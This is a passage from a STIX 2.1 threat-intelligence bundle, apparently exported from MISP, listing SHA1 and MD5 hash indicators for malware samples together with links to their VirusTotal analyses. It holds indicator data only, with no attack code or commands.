"url--58db7ff5-eaac-4d8e-bb3e-4b5b02de0b81"
|
|
],
|
|
"labels": [
|
|
"misp:type=\"link\"",
|
|
"misp:category=\"External analysis\""
|
|
]
|
|
},
|
|
{
|
|
"type": "url",
|
|
"spec_version": "2.1",
|
|
"id": "url--58db7ff5-eaac-4d8e-bb3e-4b5b02de0b81",
|
|
"value": "https://www.virustotal.com/file/e6624eb4520d41516f64aa64a00ee224c8bf257403a12a9665d552348dad1bd5/analysis/1434845892/"
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db7ff6-111c-4c27-8abb-4fab02de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:35:50.000Z",
|
|
"modified": "2017-03-29T09:35:50.000Z",
|
|
"description": "sample - Xchecked via VT: 42da6fd7f6ba8b90ffd1298d068045c7928cef6506642e69859e0b962b5864a8",
|
|
"pattern": "[file:hashes.SHA1 = 'a4c25a563f85fc1b85020c8e44f9a22e9cc93a1f']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:35:50Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha1\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db7ff7-89c4-47ac-b33e-489502de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:35:51.000Z",
|
|
"modified": "2017-03-29T09:35:51.000Z",
|
|
"description": "sample - Xchecked via VT: 42da6fd7f6ba8b90ffd1298d068045c7928cef6506642e69859e0b962b5864a8",
|
|
"pattern": "[file:hashes.MD5 = 'f91d32991676985c8090543fb0a64eb9']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:35:51Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"md5\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "observed-data",
|
|
"spec_version": "2.1",
|
|
"id": "observed-data--58db7ff8-4824-481e-8eb2-40b502de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:35:52.000Z",
|
|
"modified": "2017-03-29T09:35:52.000Z",
|
|
"first_observed": "2017-03-29T09:35:52Z",
|
|
"last_observed": "2017-03-29T09:35:52Z",
|
|
"number_observed": 1,
|
|
"object_refs": [
|
|
"url--58db7ff8-4824-481e-8eb2-40b502de0b81"
|
|
],
|
|
"labels": [
|
|
"misp:type=\"link\"",
|
|
"misp:category=\"External analysis\""
|
|
]
|
|
},
|
|
{
|
|
"type": "url",
|
|
"spec_version": "2.1",
|
|
"id": "url--58db7ff8-4824-481e-8eb2-40b502de0b81",
|
|
"value": "https://www.virustotal.com/file/42da6fd7f6ba8b90ffd1298d068045c7928cef6506642e69859e0b962b5864a8/analysis/1450390001/"
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db7ff9-15ec-4053-931e-404302de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:35:53.000Z",
|
|
"modified": "2017-03-29T09:35:53.000Z",
|
|
"description": "sample - Xchecked via VT: dddb5843c775ae47b37fd02c378699b4e250ac32739f30e0949bdaa28050a595",
|
|
"pattern": "[file:hashes.SHA1 = '1916115d91d784c67ac9c79847d2a9a89d537ea0']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:35:53Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha1\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db7ffa-cb6c-464b-84aa-4b2d02de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:35:54.000Z",
|
|
"modified": "2017-03-29T09:35:54.000Z",
|
|
"description": "sample - Xchecked via VT: dddb5843c775ae47b37fd02c378699b4e250ac32739f30e0949bdaa28050a595",
|
|
"pattern": "[file:hashes.MD5 = 'a0c9e294c9002fcd22c22a176132e3e0']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:35:54Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"md5\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "observed-data",
|
|
"spec_version": "2.1",
|
|
"id": "observed-data--58db7ffb-b354-4acf-a33c-4ef202de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:35:55.000Z",
|
|
"modified": "2017-03-29T09:35:55.000Z",
|
|
"first_observed": "2017-03-29T09:35:55Z",
|
|
"last_observed": "2017-03-29T09:35:55Z",
|
|
"number_observed": 1,
|
|
"object_refs": [
|
|
"url--58db7ffb-b354-4acf-a33c-4ef202de0b81"
|
|
],
|
|
"labels": [
|
|
"misp:type=\"link\"",
|
|
"misp:category=\"External analysis\""
|
|
]
|
|
},
|
|
{
|
|
"type": "url",
|
|
"spec_version": "2.1",
|
|
"id": "url--58db7ffb-b354-4acf-a33c-4ef202de0b81",
|
|
"value": "https://www.virustotal.com/file/dddb5843c775ae47b37fd02c378699b4e250ac32739f30e0949bdaa28050a595/analysis/1405551721/"
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db7ffc-23b4-4f27-abce-4cc102de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:35:56.000Z",
|
|
"modified": "2017-03-29T09:35:56.000Z",
|
|
"description": "sample - Xchecked via VT: e349394a043e11410ed3e7c35c70d85dbb9c5e512b593e51e1acde3b404414a2",
|
|
"pattern": "[file:hashes.SHA1 = '41dc41ce9982aabe5de6026a4531e6ae9077494a']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:35:56Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha1\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db7ffd-81ec-477f-89e6-481202de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:35:57.000Z",
|
|
"modified": "2017-03-29T09:35:57.000Z",
|
|
"description": "sample - Xchecked via VT: e349394a043e11410ed3e7c35c70d85dbb9c5e512b593e51e1acde3b404414a2",
|
|
"pattern": "[file:hashes.MD5 = 'b963fa36a15ba5fb88c92ebe08e4ebf6']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:35:57Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"md5\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "observed-data",
|
|
"spec_version": "2.1",
|
|
"id": "observed-data--58db7ffe-ef90-4cf1-ab2a-4b6e02de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:35:58.000Z",
|
|
"modified": "2017-03-29T09:35:58.000Z",
|
|
"first_observed": "2017-03-29T09:35:58Z",
|
|
"last_observed": "2017-03-29T09:35:58Z",
|
|
"number_observed": 1,
|
|
"object_refs": [
|
|
"url--58db7ffe-ef90-4cf1-ab2a-4b6e02de0b81"
|
|
],
|
|
"labels": [
|
|
"misp:type=\"link\"",
|
|
"misp:category=\"External analysis\""
|
|
]
|
|
},
|
|
{
|
|
"type": "url",
|
|
"spec_version": "2.1",
|
|
"id": "url--58db7ffe-ef90-4cf1-ab2a-4b6e02de0b81",
|
|
"value": "https://www.virustotal.com/file/e349394a043e11410ed3e7c35c70d85dbb9c5e512b593e51e1acde3b404414a2/analysis/1469650112/"
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db7ffe-ebf4-43b2-b3b0-45eb02de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:35:58.000Z",
|
|
"modified": "2017-03-29T09:35:58.000Z",
|
|
"description": "sample - Xchecked via VT: 31df6ec1089e720c09e29f35ce33203359128c99cc0e4b03ec3e38237e8151ff",
|
|
"pattern": "[file:hashes.SHA1 = '77455b6294202e774f5b2949d327a521c658d115']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:35:58Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha1\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db8000-cb88-400d-af2f-4ade02de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:36:00.000Z",
|
|
"modified": "2017-03-29T09:36:00.000Z",
|
|
"description": "sample - Xchecked via VT: 31df6ec1089e720c09e29f35ce33203359128c99cc0e4b03ec3e38237e8151ff",
|
|
"pattern": "[file:hashes.MD5 = '53d29f8e142ece16208df5a043c19d9c']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:36:00Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"md5\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "observed-data",
|
|
"spec_version": "2.1",
|
|
"id": "observed-data--58db8000-5d94-4ef0-87a4-4c0302de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:36:00.000Z",
|
|
"modified": "2017-03-29T09:36:00.000Z",
|
|
"first_observed": "2017-03-29T09:36:00Z",
|
|
"last_observed": "2017-03-29T09:36:00Z",
|
|
"number_observed": 1,
|
|
"object_refs": [
|
|
"url--58db8000-5d94-4ef0-87a4-4c0302de0b81"
|
|
],
|
|
"labels": [
|
|
"misp:type=\"link\"",
|
|
"misp:category=\"External analysis\""
|
|
]
|
|
},
|
|
{
|
|
"type": "url",
|
|
"spec_version": "2.1",
|
|
"id": "url--58db8000-5d94-4ef0-87a4-4c0302de0b81",
|
|
"value": "https://www.virustotal.com/file/31df6ec1089e720c09e29f35ce33203359128c99cc0e4b03ec3e38237e8151ff/analysis/1450677233/"
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db8001-77e8-4b17-9c4e-41ae02de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:36:01.000Z",
|
|
"modified": "2017-03-29T09:36:01.000Z",
|
|
"description": "sample - Xchecked via VT: 97bbfb81f930d138ff47c3b899eee6917802385b8c8c1626a7679c5cab41c4a2",
|
|
"pattern": "[file:hashes.SHA1 = 'c5594f5def435d0f603caeed4872b6913164c2fb']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:36:01Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha1\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db8002-5868-4ab7-bc0b-44f702de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:36:02.000Z",
|
|
"modified": "2017-03-29T09:36:02.000Z",
|
|
"description": "sample - Xchecked via VT: 97bbfb81f930d138ff47c3b899eee6917802385b8c8c1626a7679c5cab41c4a2",
|
|
"pattern": "[file:hashes.MD5 = '9d2458f2f8870b3a3c9621bdc53092fd']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:36:02Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"md5\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "observed-data",
|
|
"spec_version": "2.1",
|
|
"id": "observed-data--58db8003-a9f4-4a87-a07a-48d102de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:36:03.000Z",
|
|
"modified": "2017-03-29T09:36:03.000Z",
|
|
"first_observed": "2017-03-29T09:36:03Z",
|
|
"last_observed": "2017-03-29T09:36:03Z",
|
|
"number_observed": 1,
|
|
"object_refs": [
|
|
"url--58db8003-a9f4-4a87-a07a-48d102de0b81"
|
|
],
|
|
"labels": [
|
|
"misp:type=\"link\"",
|
|
"misp:category=\"External analysis\""
|
|
]
|
|
},
|
|
{
|
|
"type": "url",
|
|
"spec_version": "2.1",
|
|
"id": "url--58db8003-a9f4-4a87-a07a-48d102de0b81",
|
|
"value": "https://www.virustotal.com/file/97bbfb81f930d138ff47c3b899eee6917802385b8c8c1626a7679c5cab41c4a2/analysis/1450505872/"
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db8004-be70-43d9-8d64-496f02de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:36:04.000Z",
|
|
"modified": "2017-03-29T09:36:04.000Z",
|
|
"description": "sample - Xchecked via VT: 210024ece45a6935da89ab7c5ae3293616679414e96e2157e49f9f607c831bdc",
|
|
"pattern": "[file:hashes.SHA1 = 'fae17a413c0418bb5439c209ae5764b150bd2efd']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:36:04Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha1\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db8005-3864-486e-b638-408e02de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:36:05.000Z",
|
|
"modified": "2017-03-29T09:36:05.000Z",
|
|
"description": "sample - Xchecked via VT: 210024ece45a6935da89ab7c5ae3293616679414e96e2157e49f9f607c831bdc",
|
|
"pattern": "[file:hashes.MD5 = '7853b5f8407c70dfaa9bb5e8dc983e90']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:36:05Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"md5\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "observed-data",
|
|
"spec_version": "2.1",
|
|
"id": "observed-data--58db8006-49dc-4089-9b6f-486302de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:36:06.000Z",
|
|
"modified": "2017-03-29T09:36:06.000Z",
|
|
"first_observed": "2017-03-29T09:36:06Z",
|
|
"last_observed": "2017-03-29T09:36:06Z",
|
|
"number_observed": 1,
|
|
"object_refs": [
|
|
"url--58db8006-49dc-4089-9b6f-486302de0b81"
|
|
],
|
|
"labels": [
|
|
"misp:type=\"link\"",
|
|
"misp:category=\"External analysis\""
|
|
]
|
|
},
|
|
{
|
|
"type": "url",
|
|
"spec_version": "2.1",
|
|
"id": "url--58db8006-49dc-4089-9b6f-486302de0b81",
|
|
"value": "https://www.virustotal.com/file/210024ece45a6935da89ab7c5ae3293616679414e96e2157e49f9f607c831bdc/analysis/1448708557/"
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db8007-c364-4ffc-9095-4f6d02de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:36:07.000Z",
|
|
"modified": "2017-03-29T09:36:07.000Z",
|
|
"description": "sample - Xchecked via VT: 75285821f9997b304058e8bf76c7c3f9f4abcf47e0dffea73d6256f657b9e778",
|
|
"pattern": "[file:hashes.SHA1 = 'aa4f06fe292cecb75a3a7a1f0d80e00994045f64']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:36:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha1\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db8009-c484-476f-b389-4a0502de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:36:09.000Z",
|
|
"modified": "2017-03-29T09:36:09.000Z",
|
|
"description": "sample - Xchecked via VT: 75285821f9997b304058e8bf76c7c3f9f4abcf47e0dffea73d6256f657b9e778",
|
|
"pattern": "[file:hashes.MD5 = '45a29009e658e99a372c476e8b852199']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:36:09Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"md5\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "observed-data",
|
|
"spec_version": "2.1",
|
|
"id": "observed-data--58db800a-b0bc-423a-b83f-490d02de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:36:10.000Z",
|
|
"modified": "2017-03-29T09:36:10.000Z",
|
|
"first_observed": "2017-03-29T09:36:10Z",
|
|
"last_observed": "2017-03-29T09:36:10Z",
|
|
"number_observed": 1,
|
|
"object_refs": [
|
|
"url--58db800a-b0bc-423a-b83f-490d02de0b81"
|
|
],
|
|
"labels": [
|
|
"misp:type=\"link\"",
|
|
"misp:category=\"External analysis\""
|
|
]
|
|
},
|
|
{
|
|
"type": "url",
|
|
"spec_version": "2.1",
|
|
"id": "url--58db800a-b0bc-423a-b83f-490d02de0b81",
|
|
"value": "https://www.virustotal.com/file/75285821f9997b304058e8bf76c7c3f9f4abcf47e0dffea73d6256f657b9e778/analysis/1475965009/"
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db800b-7ae8-4fca-8848-477a02de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:36:11.000Z",
|
|
"modified": "2017-03-29T09:36:11.000Z",
|
|
"description": "sample - Xchecked via VT: 7b801c415f2fb9210c4d89e7d6332c1a812defe78b234d658b60f9337b8f4266",
|
|
"pattern": "[file:hashes.SHA1 = '771822d7ef837e73942313af1f88d5f479d124b6']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:36:11Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha1\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db800c-0114-47cd-b048-43ee02de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:36:12.000Z",
|
|
"modified": "2017-03-29T09:36:12.000Z",
|
|
"description": "sample - Xchecked via VT: 7b801c415f2fb9210c4d89e7d6332c1a812defe78b234d658b60f9337b8f4266",
|
|
"pattern": "[file:hashes.MD5 = 'bab5662dea5c1db9bee32ab1353bed8c']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:36:12Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"md5\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "observed-data",
|
|
"spec_version": "2.1",
|
|
"id": "observed-data--58db800d-c8a8-4a92-bfc9-408a02de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:36:13.000Z",
|
|
"modified": "2017-03-29T09:36:13.000Z",
|
|
"first_observed": "2017-03-29T09:36:13Z",
|
|
"last_observed": "2017-03-29T09:36:13Z",
|
|
"number_observed": 1,
|
|
"object_refs": [
|
|
"url--58db800d-c8a8-4a92-bfc9-408a02de0b81"
|
|
],
|
|
"labels": [
|
|
"misp:type=\"link\"",
|
|
"misp:category=\"External analysis\""
|
|
]
|
|
},
|
|
{
|
|
"type": "url",
|
|
"spec_version": "2.1",
|
|
"id": "url--58db800d-c8a8-4a92-bfc9-408a02de0b81",
|
|
"value": "https://www.virustotal.com/file/7b801c415f2fb9210c4d89e7d6332c1a812defe78b234d658b60f9337b8f4266/analysis/1445655170/"
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db800e-d1c0-4dd9-83ce-480202de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:36:14.000Z",
|
|
"modified": "2017-03-29T09:36:14.000Z",
|
|
"description": "sample - Xchecked via VT: dad5e918c4ce849f682485bd79e097ac097b554daa897b12151b4595d67980aa",
|
|
"pattern": "[file:hashes.SHA1 = 'e66caa0aa782b9981933e90292cc7f9b6695a1e3']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:36:14Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha1\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db800e-36d0-462e-b766-4aa002de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:36:14.000Z",
|
|
"modified": "2017-03-29T09:36:14.000Z",
|
|
"description": "sample - Xchecked via VT: dad5e918c4ce849f682485bd79e097ac097b554daa897b12151b4595d67980aa",
|
|
"pattern": "[file:hashes.MD5 = 'a4545bfd49bae258e688a7fbafcbd0ba']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:36:14Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"md5\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "observed-data",
|
|
"spec_version": "2.1",
|
|
"id": "observed-data--58db800f-19d4-4acb-93c6-474b02de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:36:15.000Z",
|
|
"modified": "2017-03-29T09:36:15.000Z",
|
|
"first_observed": "2017-03-29T09:36:15Z",
|
|
"last_observed": "2017-03-29T09:36:15Z",
|
|
"number_observed": 1,
|
|
"object_refs": [
|
|
"url--58db800f-19d4-4acb-93c6-474b02de0b81"
|
|
],
|
|
"labels": [
|
|
"misp:type=\"link\"",
|
|
"misp:category=\"External analysis\""
|
|
]
|
|
},
|
|
{
|
|
"type": "url",
|
|
"spec_version": "2.1",
|
|
"id": "url--58db800f-19d4-4acb-93c6-474b02de0b81",
|
|
"value": "https://www.virustotal.com/file/dad5e918c4ce849f682485bd79e097ac097b554daa897b12151b4595d67980aa/analysis/1475976353/"
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db8010-d8cc-4b6a-99c5-4e4902de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:36:16.000Z",
|
|
"modified": "2017-03-29T09:36:16.000Z",
|
|
"description": "sample - Xchecked via VT: 3bb134617af6f7b0f0c483b315f7ea45b2ed2c4a91005b453c9ec9e86ef0d70b",
|
|
"pattern": "[file:hashes.SHA1 = 'd52a7fa6d4dab80eacf95513139b9abb69e6dc9f']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:36:16Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha1\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db8011-a8f4-4afc-8a20-460102de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:36:17.000Z",
|
|
"modified": "2017-03-29T09:36:17.000Z",
|
|
"description": "sample - Xchecked via VT: 3bb134617af6f7b0f0c483b315f7ea45b2ed2c4a91005b453c9ec9e86ef0d70b",
|
|
"pattern": "[file:hashes.MD5 = '72fe42ff160524017760de177243518d']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:36:17Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"md5\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "observed-data",
|
|
"spec_version": "2.1",
|
|
"id": "observed-data--58db8012-b25c-42d1-9f08-456702de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:36:18.000Z",
|
|
"modified": "2017-03-29T09:36:18.000Z",
|
|
"first_observed": "2017-03-29T09:36:18Z",
|
|
"last_observed": "2017-03-29T09:36:18Z",
|
|
"number_observed": 1,
|
|
"object_refs": [
